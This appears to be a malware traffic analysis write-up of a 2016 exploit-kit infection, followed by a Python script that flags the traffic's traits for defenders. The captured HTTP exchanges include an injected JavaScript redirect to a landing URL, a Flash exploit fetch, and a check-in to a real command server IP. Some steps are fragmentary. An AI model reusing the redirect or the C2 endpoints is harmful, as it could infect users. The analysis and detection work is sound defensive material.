Source: malware-traffic-analysis.net
The infection method is as follows:
* Analyze PCAP using filter "http.request"
Relevant Additional Analysis:
<param name="allowScriptAccess" value="always"/><param name="movie" value="hxxp://mapobifi[.]xyz/qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/"/>
Accept: */*
Accept-Language: en-US
Referer: hxxp://www[.]tdca[.]ca/
x-flash-version: 19,0,0,185
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: mapobifi.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 5508
Connection: close
Content-Type: application/x-shockwave-flash
GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/xqt.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://www[.]tdca[.]ca/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: mapobifi.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 26 Aug 2016 22:46:50 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 821
Connection: close
Content-Type: text/html; charset=UTF-8
3. Using JavaScript, redirects the user to
The full source code is as follows:
FkvuNhVRWkQvU gHotiiKKThQZIzrkE fTWAIIlM d hRBB
document.location.href = "hxxp://ew[.]203KCONTRACTORSARKANSAS[.]COM/?zniKfrGYKh_HA4o=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7ZfHFONu3w_xyrQUeZ4jzkLR62ZYxOwVVVkWsw5Azf-ZBKqE";
geLpj gSiBzQqkfSZxSYdDAiUSDyI JwGPSXD xnJ
4. GET
6. GET to /default[.]jpg and POST to /yyy/fers[.]php on 109.236.87.204
The full exchange is as follows:
GET /default[.]jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 109.236.87.204
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 27 Aug 2016 01:10:20 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: "7-5332e92dca840"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg
default
POST /yyy/fers[.]php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 109.236.87.204
Content-Length: 1395
Cache-Control: no-cache
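To turn the observations above into something repeatable, here is an added example (not from malware-traffic-analysis.net) that parses raw HTTP request/response pairs like the ones in this capture and flags the traits a defender would alert on: a Flash plugin fetching a SWF from a long random path, an "image/jpeg" response whose body is not a JPEG, and a POST to a .php script from a non-browser User-Agent against a bare-IP host. The sample messages are constructed from the headers shown on the page, with defanging removed and the POST's response assumed to be empty since the page does not show it.

```python
import re

# Constructed sample exchanges modelled on the capture above; defanging
# ("hxxp", "[.]") removed so the strings look like wire data decoded as latin-1.
SAMPLES = [
    ("GET /qdxtqktkb-3eif2rcdffpankm1of3cknbdm0ktfmppsn5peeocarbobmmdrmkmmpnet3inaa9rre2e2atatfibmcpfrile/ HTTP/1.1\r\n"
     "Referer: http://www.tdca.ca/\r\nx-flash-version: 19,0,0,185\r\n"
     "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\nHost: mapobifi.xyz\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Length: 5508\r\nContent-Type: application/x-shockwave-flash\r\n\r\n" + "CWS" + "x" * 5505),
    ("GET /default.jpg HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"
     "Host: 109.236.87.204\r\nCache-Control: no-cache\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Length: 7\r\nContent-Type: image/jpeg\r\n\r\ndefault"),
    ("POST /yyy/fers.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: post_example\r\n"
     "Host: 109.236.87.204\r\nContent-Length: 1395\r\nCache-Control: no-cache\r\n\r\n" + "k=v&" * 348 + "end",
     "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),  # response body not shown on the page; assumed empty
]

def parse_http(raw):
    """Split one HTTP message into (start line, lowercase header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify(request_raw, response_raw):
    """Return the indicator names that fire for one request/response pair."""
    req_line, req, _ = parse_http(request_raw)
    _, resp, body = parse_http(response_raw)
    method, path = req_line.split(" ")[:2]
    ctype = resp.get("content-type", "")
    findings = []
    # Flash plugin pulling a SWF from a long random-looking path: EK landing page -> Flash exploit
    if "x-flash-version" in req and ctype.startswith("application/x-shockwave-flash") and len(path) > 40:
        findings.append("swf_from_random_path")
    # Server claims an image but the body lacks the JPEG magic (FF D8): fake image used as a check-in
    if ctype.startswith("image/") and not body.startswith("\xff\xd8"):
        findings.append("fake_image_response")
    # POST to a .php script with a non-browser User-Agent: post-infection check-in / data upload
    if method == "POST" and path.endswith(".php") and not req.get("user-agent", "").startswith("Mozilla/"):
        findings.append("nonbrowser_post_to_php")
    # Host header is a bare IPv4 address rather than a domain name
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", req.get("host", "")):
        findings.append("host_is_bare_ip")
    return findings
```

Running `classify(*pair)` over each entry of `SAMPLES` tags the SWF fetch, the fake image, and the check-in POST respectively; the same function can be fed pairs exported from Wireshark's "Follow HTTP Stream" output.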